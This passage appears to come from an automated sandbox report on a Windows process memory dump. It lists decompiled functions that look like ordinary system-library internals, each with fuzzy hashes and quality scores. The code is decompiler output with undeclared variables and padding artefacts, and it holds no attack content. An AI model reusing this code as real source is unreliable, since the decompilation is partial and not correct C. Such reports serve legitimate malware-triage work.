0x03463821
0x03463826
0x00000000
0x00000000
0x03463828
0x0346382a
0x03463841
0x00000000
0x03463841

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f943989df893173be0b2167086e2a6539988b6cf7be0f400b5a633de557c6b16
Instruction ID: 39a8d128e21b3d866119d11afd4f7cf5cb16af047665ba928883e5544b49b384
Opcode Fuzzy Hash: f943989df893173be0b2167086e2a6539988b6cf7be0f400b5a633de557c6b16
Instruction Fuzzy Hash: B0010879A016905BC337CF1A9900E6BBBEADF86A5071954AFE8058F320D730C801C799

Uniqueness

Uniqueness Score: -1.00%

Function 0342C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0342C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x351d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0343EEF0(0x35170a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E034AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0343EB70(_t29, 0x35170a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0346B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E034AF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x35170c0; // 0x0
					while(_t38 != 0x35170c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x351b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0342c96a
0x0342c974
0x0342c988
0x0342c98a
0x03497c9d
0x03497c9f
0x03497ca4
0x03497cae
0x03497cf0
0x03497cf5
0x03497cfa
0x0342c992
0x0342c996
0x0342c997
0x0342c998
0x0342c9a3
0x0342c9a3
0x03497cb0
0x03497cb7
0x03497cbb
0x00000000
0x00000000
0x03497cbd
0x03497ce8
0x03497cc5
0x03497cc8
0x03497cca
0x03497cd0
0x03497cd6
0x03497cde
0x03497ce4
0x03497ce4
0x03497cd0
0x00000000
0x03497ce8
0x0342c990
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771262fae00d98b912c1a0fcde0c3647c0b77800b9afd05c01f6bb790a7f2881
Instruction ID: 88343ee540108c58e9ff6d2d4bb71be072f920076f166c20cd9a66abf0f60238
Opcode Fuzzy Hash: 771262fae00d98b912c1a0fcde0c3647c0b77800b9afd05c01f6bb790a7f2881
Instruction Fuzzy Hash: E211A0323107069FDB10EF2D9C85A2BBFE5BB88610B04052BE8429F661DB20EC55CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0345002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0345002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03447D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03447D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03447D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03447D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x03450032
0x03450037
0x03450043
0x03494b3a
0x03450049
0x03450049
0x03450049
0x0345004e
0x03450053
0x03494b48
0x03494b5a
0x03494b4a
0x03494b53
0x03494b53
0x03494b5f
0x00000000
0x03494b61
0x00000000
0x03494b61
0x03450059
0x03450059
0x03450060
0x03494b6f
0x03494b6f
0x03450069
0x03494b83
0x00000000
0x00000000
0x03494b90
0x03494b9b
0x03494b9b
0x03494ba4
0x00000000
0x00000000
0x03494baa
0x00000000
0x0345006f
0x0345006f
0x00000000
0x0345006f
0x03450069

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 5f0ec7d5ece047377f10fc9f976b9712bd83723508a19224e0fdf890358a074b
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: A111C276A056808FEB22DB26D544B267BD8AB41B54F0D00E3ED249F792D328C843C25C

Uniqueness

Uniqueness Score: -1.00%

Function 0343766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0343766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0345F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0345F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03444620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x03437672
0x0343767f
0x03437689
0x034376de
0x034376de
0x0343768b
0x03437691
0x03437693
0x03437697
0x00000000
0x03437699
0x034376a8
0x00000000
0x034376aa
0x034376ad
0x034376b1
0x00000000
0x034376b3
0x034376b3
0x034376b5
0x034376ba
0x034376bc
0x034376bc
0x034376c0
0x00000000
0x034376c2
0x034376ce
0x034376ce
0x034376c0
0x034376b1
0x034376a8
0x03437697
0x034376d9

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: f0a5afc6c87cd0046f2d0c22370d0ebb68f8c5241ed0d5f090198e31e3c27311
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: CD018872740119AFD720DE5ECD51E5BBBADEB89670B144526B948CF3A0DA30DD0187A8

Uniqueness

Uniqueness Score: -1.00%

Function 034BC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E034BC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03469910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E034695B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E034695D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E034695D0();
				return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x034bc458
0x034bc45d
0x034bc466
0x034bc468
0x034bc469
0x034bc46a
0x034bc46b
0x034bc46e
0x034bc46f
0x034bc471
0x034bc476
0x034bc476
0x034bc47c
0x034bc47e
0x034bc480
0x034bc480
0x034bc483
0x034bc484
0x034bc486
0x034bc488
0x034bc48f
0x034bc491
0x034bc493
0x034bc493
0x034bc48f
0x034bc498
0x034bc49e
0x034bc4ad
0x034bc4ad
0x034bc4b2
0x034bc4b4
0x034bc4cd

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 52d601d1756ed1a5aa4e5adcc0b3ac69b7f717ed53741a2bd0a46502af3f21fd
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: C4016D76140605BFE621EF66CDD0EA2FB7DFB54390B04452BF2144A660CB71ACA1CAB9

Uniqueness

Uniqueness Score: -1.00%

Function 03429080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E03429080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x35185ec;
				E03442280(_t48, 0x35185ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0343FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x351538c; // 0x77f06848
					if( *_t84 != 0x3515388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x34ff6e8);
						E0347D0E8(0x35185ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E034F88F5(_t80, _t85, 0x3515388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x35186c0; // 0xc01228
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x35186b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03442280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E034F88F5(0x35185ec, _t85, 0x3515388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0346AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x351b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x35184c0;
																			if(_t82 >=  *0x35184c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E034F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0342922A(_t99);
										_t64 = E03447D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E034F8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x35186c0; // 0xc01228
											if(__eflags != 0) {
												__eflags = _t99 -  *0x35186b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x35186bc;
													_t87 = 0x35186b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03429240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x35186c4;
												_t87 = 0x35186c0;
												L27:
												E03459B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0347D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3515388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x351538c = _t51;
						goto L6;
					}
				}
			}

0x03429082
0x03429083
0x03429084
0x03429085
0x03429087
0x03429096
0x03429098
0x03429098
0x0342909e
0x034290a8
0x034290e7
0x034290e7
0x034290aa
0x034290b0
0x034290b7
0x034290bd
0x034290dd
0x034290e6
0x034290bf
0x034290bf
0x034290c7
0x034290cf
0x034290f1
0x034290f2
0x034290f4
0x034290f5
0x034290f6
0x034290f7
0x034290f8
0x034290f9
0x034290fa
0x034290fb
0x034290fc
0x034290fd
0x034290fe
0x034290ff
0x03429100
0x03429102
0x03429107
0x0342910c
0x03429110
0x03429113
0x03429115
0x03429136
0x0342913f
0x03429143
0x034837e4
0x034837e4
0x03429117
0x03429117
0x0342911d
0x00000000
0x0342911f
0x0342911f
0x03429125
0x00000000
0x03429127
0x0342912d
0x03429130
0x03429134
0x03429158
0x0342915d
0x03429161
0x03429168
0x03483715
0x0342916e
0x0342916e
0x03429175
0x03429177
0x0342917e
0x0342917f
0x03429182
0x03429182
0x03429187
0x03429187
0x0342918a
0x0342918d
0x0342918f
0x03429192
0x03429195
0x03429198
0x03429198
0x03429198
0x0342919a
0x00000000
0x00000000
0x0348371f
0x03483721
0x03483727
0x0348372f
0x03483733
0x03483735
0x03483738
0x0348373b
0x0348373d
0x03483740
0x00000000
0x03483746
0x03483746
0x03483749
0x00000000
0x0348374f
0x0348374f
0x03483751
0x03483757
0x03483759
0x0348375c
0x0348375c
0x0348375e
0x0348375e
0x03483761
0x03483764
0x00000000
0x00000000
0x03483766
0x03483768
0x034837a3
0x034837a3
0x034837a5
0x034837a7
0x034837ad
0x034837b0
0x034837b2
0x034837bc
0x034837c2
0x034837c2
0x034837b2
0x03429187
0x03429187
0x0342918a
0x0342918d
0x0342918f
0x03429192
0x03429195
0x00000000
0x03429195
0x00000000
0x0348376a
0x0348376a
0x0348376a
0x0348376c
0x0348376c
0x0348376f
0x03483775
0x00000000
0x00000000
0x03483777
0x03483779
0x03483782
0x03483787
0x03483789
0x03483790
0x03483790
0x0348378b
0x0348378b
0x0348378b
0x03483792
0x03483795
0x00000000
0x03483795
0x00000000
0x03483779
0x03483798
0x00000000
0x03483798
0x00000000
0x03483768
0x0348379b
0x0348379b
0x03483751
0x03483749
0x00000000
0x03483740
0x034291a0
0x034291a3
0x034291a9
0x034291b0
0x00000000
0x034291b0
0x03429187
0x034291b4
0x034291b4
0x034291bb
0x034291c0
0x034291c5
0x034291c7
0x034837da
0x034291cd
0x034291cd
0x034291cd
0x034291d2
0x034291d5
0x03429239
0x03429239
0x034291d7
0x034291db
0x034291e1
0x034291e7
0x034291fd
0x03429203
0x0342921e
0x03429223
0x00000000
0x03429205
0x03429205
0x03429208
0x0342920c
0x03429214
0x03429214
0x0342920c
0x034291e9
0x034291e9
0x034291ee
0x034291f3
0x034291f3
0x034291f3
0x034291e7
0x00000000
0x00000000
0x00000000
0x03429134
0x03429125
0x0342911d
0x0342914e
0x034290d1
0x034290d1
0x034290d3
0x034290d6
0x034290d8
0x00000000
0x034290d8
0x034290cf

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a03722d8f774303a5e6c9e0b966143acf5be5a675123548b4ca6a41a3eccf8
Instruction ID: f3ef63344f004afa5eefae4d851b5f9b1056760592e57d09fbe5cccd8b6ea0f4
Opcode Fuzzy Hash: 20a03722d8f774303a5e6c9e0b966143acf5be5a675123548b4ca6a41a3eccf8
Instruction Fuzzy Hash: 3901D1726016188FD324DF05D840B12BBE9EB86320F29456BE601DF7A1D370DC51CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 034F4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E034F4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03442280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03442280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x35186ac);
					E0342F900(0x35186d4, _t28);
					E0343FFB0(0x35186ac, _t28, 0x35186ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0343FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x034f401a
0x034f401e
0x034f4023
0x034f4028
0x034f4029
0x034f402b
0x034f402f
0x034f4043
0x034f4046
0x034f4051
0x034f4057
0x034f405f
0x034f4062
0x034f4067
0x034f406f
0x034f407c
0x034f407c
0x034f408c
0x034f408c
0x034f4097

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12cb08fa84bba951773d2179f7a8aab6266a74cdc2374cd09876892f57450924
Instruction ID: f3ef44f939f0b3e0dbc102b36e76b12ef8657a5d3fd5759892f6ce782511c829
Opcode Fuzzy Hash: 12cb08fa84bba951773d2179f7a8aab6266a74cdc2374cd09876892f57450924
Instruction Fuzzy Hash: 6A018475601A497FD211EB6ACD80E17B7ACFB49660B04062BF6088FA21CB24EC11C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 034E138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E034E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x351d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0346FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03447D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0346B640(E03469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x034e138a
0x034e138a
0x034e1399
0x034e13a3
0x034e13a8
0x034e13aa
0x034e13b5
0x034e13bb
0x034e13c3
0x034e13c6
0x034e13c9
0x034e13d4
0x034e13e6
0x034e13d6
0x034e13df
0x034e13df
0x034e13f1
0x034e13f2
0x034e13f4
0x034e13f9
0x034e140e

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb79a75206d213332778fd76115dbc699cacbce05d502e0ebfaa2a2149fbfe23
Instruction ID: 5a2c4e9437d7ffcec84be53ed84d6cbba7c02eabc143469af62cf27289d14529
Opcode Fuzzy Hash: bb79a75206d213332778fd76115dbc699cacbce05d502e0ebfaa2a2149fbfe23
Instruction Fuzzy Hash: E0015275A00358AFDB14DFA9D881EAEBBB8EF44710F00406BB914EF380DA749A05C795

Uniqueness

Uniqueness Score: -1.00%

Function 034E14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E034E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x351d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0346FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03447D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0346B640(E03469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x034e14fb
0x034e14fb
0x034e150a
0x034e1514
0x034e1519
0x034e151b
0x034e1526
0x034e152c
0x034e1534
0x034e1537
0x034e153a
0x034e1545
0x034e1557
0x034e1547
0x034e1550
0x034e1550
0x034e1562
0x034e1563
0x034e1565
0x034e156a
0x034e157f

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94431d575641928412c04c82c9e2dca3b2abd3bbd046730dad44b6c4bbe6bc4
Instruction ID: 22861f78b2c7e496148a66a21f509d12eefd6b52ec0be44e55ae2ded589f2192
Opcode Fuzzy Hash: f94431d575641928412c04c82c9e2dca3b2abd3bbd046730dad44b6c4bbe6bc4
Instruction Fuzzy Hash: FA018075A00358AFCB00DF69D841EAEBBB8EF44700F40406BB915EF380DA70DA01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 034258EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E034258EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x351d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x3405c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03425943() != 0 &&  *0x3515320 > 5) {
					E034A7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E034A7B5E( &_v28, _t28);
					_t11 = E034A7B9C(0x3515320, 0x340bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0346B640(_t11, _t17, _v8 ^ _t29, 0x340bf15, _t27, _t28);
			}

0x034258fb
0x034258fe
0x03425906
0x0342590a
0x0342593c
0x0342593c
0x0342590c
0x0342590c
